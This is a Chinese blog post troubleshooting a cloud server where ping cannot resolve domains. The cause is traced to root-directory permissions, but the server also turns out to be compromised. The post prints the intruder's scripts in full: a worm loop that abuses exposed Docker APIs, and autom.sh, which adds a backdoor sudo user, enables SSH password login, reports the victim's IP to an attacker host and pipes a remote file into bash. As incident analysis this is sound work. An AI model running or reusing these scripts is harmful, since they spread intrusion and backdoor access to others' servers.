博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
记一次吐血的ping: unknown host
阅读量:6814 次
发布时间:2019-06-26

本文共 11275 字,大约阅读时间需要 37 分钟。

hot3.png

背景:

某客户的ECS,ping域名提示unknown host,ping ip则可以通,ping的时候抓包没有解析的包出去,是解析的问题吗?

1,测试ping域名以及抓包发现没有dns的解析包出去

# ping www.baidu.com -c 1ping: unknown host www.baidu.com# tcpdump -i any port 53 -nnvvtcpdump: listening on any, link-type LINUX_SLL (Linux cooked), capture size 65535 bytes

2,测试ping ip dig getent等工作正常

# ping -c 1 115.239.210.27PING 115.239.210.27 (115.239.210.27) 56(84) bytes of data.64 bytes from 115.239.210.27: icmp_seq=1 ttl=55 time=1.87 ms--- 115.239.210.27 ping statistics ---1 packets transmitted, 1 received, 0% packet loss, time 0msrtt min/avg/max/mdev = 1.875/1.875/1.875/0.000 ms# getent hosts www.baidu.com115.239.211.112 www.a.shifen.com www.baidu.com115.239.210.27  www.a.shifen.com www.baidu.com# dig www.baidu.com +shortwww.a.shifen.com.115.239.210.27115.239.211.112

3,通过上述的测试可以确定,并非dns工作出现了问题,而是ping本身出现了问题

6548636f9b7b48fac251ea114c85657e399.jpg

4,通过strace跟踪看下ping命令在运行的过程中加载文件是否有问题?

# strace -e open ping www.baidu.comopen("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3open("/lib64/libcap.so.2", O_RDONLY|O_CLOEXEC) = 3open("/lib64/libidn.so.11", O_RDONLY|O_CLOEXEC) = 3open("/lib64/libc.so.6", O_RDONLY|O_CLOEXEC) = 3open("/lib64/libattr.so.1", O_RDONLY|O_CLOEXEC) = 3......open("/etc/resolv.conf", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)open("/etc/nsswitch.conf", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)open("/lib64/tls/x86_64/libnss_dns.so.2", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)open("/lib64/tls/libnss_dns.so.2", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)open("/lib64/x86_64/libnss_dns.so.2", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)open("/lib64/libnss_dns.so.2", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)open("/usr/lib64/tls/x86_64/libnss_dns.so.2", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)open("/usr/lib64/tls/libnss_dns.so.2", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)open("/usr/lib64/x86_64/libnss_dns.so.2", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)open("/usr/lib64/libnss_dns.so.2", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)ping: unknown host www.baidu.com+++ exited with 2 +++正常的对比(版本不同有差异)# strace -e open ping -c 1 www.baidu.comopen("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3open("/lib64/libcap.so.2", O_RDONLY|O_CLOEXEC) = 3open("/lib64/libidn.so.11", O_RDONLY|O_CLOEXEC) = 3open("/lib64/libcrypto.so.10", O_RDONLY|O_CLOEXEC) = 3open("/lib64/libresolv.so.2", O_RDONLY|O_CLOEXEC) = 3open("/lib64/libm.so.6", O_RDONLY|O_CLOEXEC) = 3.......

5,提取所有的Permission denied的文件,查看权限(被我精简了一些)

# strace -e open -o p.out ping www.baidu.com |grep -i "Permission denied" p.out| awk -F "\\\"" '{print $2}'|xargs stat  File: ‘/usr/lib/locale/locale-archive’  Size: 106065056     Blocks: 207096     IO Block: 4096   regular fileDevice: fd01h/64769d    Inode: 132883      Links: 1Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)Access: 2019-05-10 21:46:34.523000000 +0800Modify: 2015-07-13 15:21:14.804155630 +0800Change: 2015-07-13 15:21:14.804155630 +0800 Birth: -  File: ‘/usr/share/locale/locale.alias’  Size: 2502          Blocks: 8          IO Block: 4096   regular fileDevice: fd01h/64769d    Inode: 132816      Links: 1Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)Access: 2019-05-10 21:48:09.380738442 +0800Modify: 2015-03-06 05:18:56.000000000 +0800Change: 2015-07-13 15:21:09.324089405 +0800 Birth: -  File: ‘/usr/lib64/gconv/gconv-modules.cache’  Size: 26254         Blocks: 56         IO Block: 4096   regular fileDevice: fd01h/64769d    Inode: 394951      Links: 1Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)Access: 2019-05-10 21:46:34.878000000 +0800Modify: 2015-07-13 15:21:15.860168393 +0800Change: 2015-07-13 15:21:15.860168393 +0800 Birth: -  File: ‘/usr/lib64/gconv/gconv-modules’  Size: 56377         Blocks: 112        IO Block: 4096   regular fileDevice: fd01h/64769d    Inode: 394941      Links: 1Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)Access: 2015-07-13 15:21:15.857168356 +0800Modify: 2015-03-06 05:18:55.000000000 +0800Change: 2015-07-13 15:21:15.510164163 +0800 Birth: -  File: ‘/etc/resolv.conf’  Size: 109           Blocks: 8          IO Block: 4096   regular fileDevice: fd01h/64769d    Inode: 660033      Links: 1Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)Access: 2019-05-10 21:50:51.650325504 +0800Modify: 2019-05-10 21:47:49.650000000 +0800Change: 2019-05-10 21:47:49.650000000 +0800 Birth: -  File: ‘/etc/nsswitch.conf’  Size: 1728          Blocks: 8          IO Block: 4096   regular fileDevice: fd01h/64769d    Inode: 658832      Links: 1Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)Access: 2019-05-10 21:47:44.965000000 +0800Modify: 2015-07-13 15:21:28.905326045 +0800Change: 2015-07-13 15:21:28.905326045 +0800 Birth: -  File: ‘/etc/ld.so.cache’  Size: 44226         Blocks: 88         IO Block: 4096   regular fileDevice: fd01h/64769d    Inode: 658829      Links: 1Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)Access: 2019-05-10 21:46:33.738000000 +0800Modify: 2019-03-22 00:16:26.262531411 +0800Change: 2019-03-22 00:16:26.262531411 +0800 Birth: -  File: ‘/lib64/libnss_dns.so.2’ -> ‘libnss_dns-2.17.so’  Size: 18            Blocks: 0          IO Block: 4096   symbolic linkDevice: fd01h/64769d    Inode: 151673      Links: 1Access: (0777/lrwxrwxrwx)  Uid: (    0/    root)   Gid: (    0/    root)Access: 2019-05-10 21:47:09.952000000 +0800Modify: 2015-07-13 15:21:15.089159075 +0800Change: 2015-07-13 15:21:15.089159075 +0800 Birth: -  File: ‘/usr/lib64/libnss_dns.so.2’ -> ‘libnss_dns-2.17.so’  Size: 18            Blocks: 0          IO Block: 4096   symbolic linkDevice: fd01h/64769d    Inode: 151673      Links: 1Access: (0777/lrwxrwxrwx)  Uid: (    0/    root)   Gid: (    0/    root)Access: 2019-05-10 21:47:09.952000000 +0800Modify: 2015-07-13 15:21:15.089159075 +0800Change: 2015-07-13 15:21:15.089159075 +0800 Birth: -

6,对比文件权限也没有发现明显的异常,我不禁有点麻爪,陷入深深的思考中

9286b2269e504400a13fe405938729f6a21.jpg

7,尝试往被黑的方向排查 ,校验rpm包,替换ping命令,以及检查入侵痕迹

#  for i in $(rpm -qa);do rpm --verify $i ||echo $i ;done|grep bin |grep -v "node_modules"S.5......    /usr/bin/gitS.5......    /usr/bin/git-receive-packS.5......    /usr/bin/git-shellS.5......    /usr/bin/git-upload-archiveS.5......    /usr/bin/git-upload-pack# lsmodModule                  Size  Used bytcp_diag               12591  0inet_diag              18543  1 tcp_diagdm_mirror              22135  0......ata_piix               35038  0i2c_core               40325  3 drm,i2c_piix4,drm_kms_helperlibata                218854  3 pata_acpi,ata_generic,ata_piix

命令,进程,module都没有明显异常

2fa025b4eda44c5875a9576a38f7aab0ee6.jpg

8,重新回到问题本身,权限访问有问题,因此到根目录下,挨个看权限

# ls -ltotal 136-rwxrwxrwx    1 root root  1963 Feb 27 03:38 autom.shlrwxrwxrwx.   1 root root     7 Nov 21  2014 bin -> usr/bindr-xr-xr-x.   4 root root  4096 May 10 21:47 bootdrwxr-xr-x   19 root root  3040 May 10 21:50 devdrwxr-xr-x. 102 root root 12288 May 10 21:50 etcdrwxr-xr-x.   8 root root  4096 Mar 22 00:15 homelrwxrwxrwx.   1 root root     7 Nov 21  2014 lib -> usr/liblrwxrwxrwx.   1 root root     9 Nov 21  2014 lib64 -> usr/lib64drwxrwxrwx    2 root root  4096 Jan 29 17:57 logsdrwx------.   2 root root 16384 Nov 22  2014 lost+founddrwxr-xr-x.   2 root root  4096 Jun 10  2014 mediadrwxr-xr-x.   3 root root  4096 Oct 23  2015 mntlrwxrwxrwx    1 root root     9 Oct 23  2015 opt -> /mnt/opt/drwxrwxr-x    3 root root  4096 Oct  9  2018 pathdr-xr-xr-x   93 root root     0 May 10 21:50 procdr-xr-x---.  30 root root  4096 May 10 23:36 rootdrwxr-xr-x   30 root root   840 May 10 21:51 runlrwxrwxrwx.   1 root root     8 Nov 21  2014 sbin -> usr/sbindrwxrwxr-x    6 root root  4096 Jan 29 17:54 shelldrwxrwxr-x    7 root root  4096 Jan 29 20:20 springbootdemo2drwxr-xr-x.   2 root root  4096 Jun 10  2014 srvdr-xr-xr-x   13 root root     0 May 11  2019 sys-rwxrwxrwx    1 root root   356 Nov  1  2018 test1.sh-rwxrwxrwx    1 root root   127 Nov  1  2018 test2.shdrwxrwxrwt.  26 root root 40960 May 11 00:10 tmpdrwxrwxr-x    3 root root  4096 Dec 22 14:48 Usersdrwxr-xr-x.  14 root root  4096 Aug  6  2018 usrdrwxr-xr-x.  23 root root  4096 May  6 11:31 var

9,对比权限没有发现问题,发现了几个脚本,看看脚本是做什么的

# cat test1.sh test2.sh#!/bin/bashsed -i 's/\r//g' $1sed -i '/::/g' $1while read HOSTLINEdoecho NOW WORKING ON $HOSTLINEdocker -H tcp://$HOSTLINE run --rm -v /:/mnt alpine chroot /mnt /bin/sh -c "yum install wget -y;apt-get install wget -y;wget http://51.*.*.146/autom.sh -O /autom.sh;chmod 777 /autom.sh;sh /autom.sh"echo DONE WITH $HOSTLINEsed -i '1d' $1done <$1-----------------#!/bin/bashsed -i 's/\r//g' $1sed -i '/::/g' $1while read HOSTLINEdosh test1.sh $1 & sleep 7; sed -i '1d' $1;done <$1-----------------# cat autom.sh#!/bin/shuseradd -m -p '$1$tVoMAZYE$s5CynwZ4QuboPD2qVQ0h9/' akayadduser -m -p '$1$tVoMAZYE$s5CynwZ4QuboPD2qVQ0h9/' akayusermod -aG sudoers akay;usermod -aG root akay;sudo adduser akay sudo;echo 'akay  ALL=(ALL:ALL) ALL' >> /etc/sudoers;sed -i 's/PasswordAuthentication no/PasswordAuthentication yes/g' /etc/ssh/sshd_config;curl icanhazip.com >/tmp/myip.txtip=$(cat /tmp/myip.txt)curl http://51.*.*.146/ip.php?ip=$ip/etc/init.d/ssh restart;/etc/init.d/sshd restart;/etc/rc.d/sshd restart;systemctl restart sshd;systemctl restart ssh;apt-get install screen -yyum install screen -yif [ $(dpkg-query -W -f='${Status}' systemd 2>/dev/null | grep -c "ok installed") -eq 0 ];then  apt-get install systemd -y;  yum install systemd -y;fi;if [ $(dpkg-query -W -f='${Status}' masscan 2>/dev/null | grep -c "ok installed") -eq 0 ];then  apt-get install masscan -y;  yum install masscan -y;fi;if [ $(dpkg-query -W -f='${Status}' iproute2 2>/dev/null | grep -c "ok installed") -eq 0 ];then  apt-get install iproute2 -y;  yum install iproute2 -y;fi;curl -s http://51.*.*.146/logo9.jpg | bash -swget http://51.*.*.146/test1.sh -O test1.sh;wget http://51.*.*.146/test2.sh -O test2.sh;#wget http://51.*.*.146/scanner.sh -O scanner.sh;sleep 2s;chmod 777 test1.sh;chmod 777 test2.sh;sleep 2s;killall xmrig;killall xm;killall proc;killall minergate-cli;killall xmr-stak;pkill -f xmrig;pkill -f xmr-stak;pkill -f xm;kill -9 xmrig;kill -9 xmr-stak;kill -a xmrig;kill -a xmr-stak;kill -a xm;sudo killall minergate-cli;sudo kill -9 minergate-cli;sudo pkill -f minergate-cli;sudo killall proc;sudo kill -9 proc;sudo pkill -f proc;sudo killall xmrig;sudo killall xmr-stak;sudo pkill -f xmrig;sudo pkill -f xmr-stak;sudo kill -9 xmrig;sudo kill -9 xmr-stak;sudo kill -a xmrig;sudo kill -a xmr-stak;systemctl daemon-reload;systemctl stop bashd.service;systemctl disable bashd.service;#sudo sh scanner.sh &

10,原来真的被黑了,建议客户购买期间,抱着研究的目的继续看ping的问题

df15668d1cd3ed510dd89e77292cf51dac4.jpg

11,灵光一闪,根目录自身是什么权限?(不用纠结时间,为了写这篇文章我重新做了很多测试)

有问题的机器# ls -ld /dr--------. 22 root root 4096 May 10 21:47 /正常的机器# ls -ld /dr-xr-xr-x. 19 root root 4096 Apr 30 17:33 /# chmod 555 /# ping -c 2 www.baidu.comPING www.a.shifen.com (115.239.210.27) 56(84) bytes of data.64 bytes from 115.239.210.27: icmp_seq=1 ttl=55 time=1.84 ms64 bytes from 115.239.210.27: icmp_seq=2 ttl=55 time=1.86 ms--- www.a.shifen.com ping statistics ---2 packets transmitted, 2 received, 0% packet loss, time 1001msrtt min/avg/max/mdev = 1.842/1.854/1.866/0.012 ms

大功告成~!

42b962d97dcb08054a2682ad7a5e0b67e03.jpg

本文为云栖社区原创内容,未经允许不得转载。

转载于:https://my.oschina.net/u/1464083/blog/3048774

你可能感兴趣的文章
使用Nodejs创建基本的网站 Microblog--《Node.js开发指南》 3
查看>>
网管工作是否值得做下去?
查看>>
神行者PD10-adb push逃脱ro权限
查看>>
JPA(四)之实体关系一对一
查看>>
如何使用羊驼自动生成缩略图的功能。
查看>>
定制化Azure站点Java运行环境(1)
查看>>
inotify用法简介及结合rsync实现主机间的文件实时同步
查看>>
php 判断手机登陆
查看>>
git 问题
查看>>
Fedora18设置终端快捷键 和 桌面快捷方式
查看>>
取消NavigationBar左右两边的空隙
查看>>
Ubuntu 12.04 Gedit中文乱码解决办法
查看>>
修改symfony sfDoctrineGuardPlugin验证密码的方法
查看>>
Vbird的Linux私房菜学习笔记之正则表达式-特殊字符
查看>>
数据的作用域
查看>>
js中括号用于自执行测试
查看>>
ssh 公钥 密钥
查看>>
c#设计模式-单例模式
查看>>
Ehcache web cahce 缓存改良版
查看>>
F5集群配置公共irule,解决X-Frame-Options漏洞及host头漏洞
查看>>
喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!-- 愿君每日到此一游!
当前时间: 2025-01-31 06:41:25   当前IP: 18.116.88.123   联系邮箱:javaeecc@qq.com     Copyright © 2020 - 2022 baihongyu.com 京ICP备2021015314号-2
强烈建议你试试无所不能的CHAT-GPT,快点击我
强烈建议你试试无所不能的CHAT-GPT,快点击我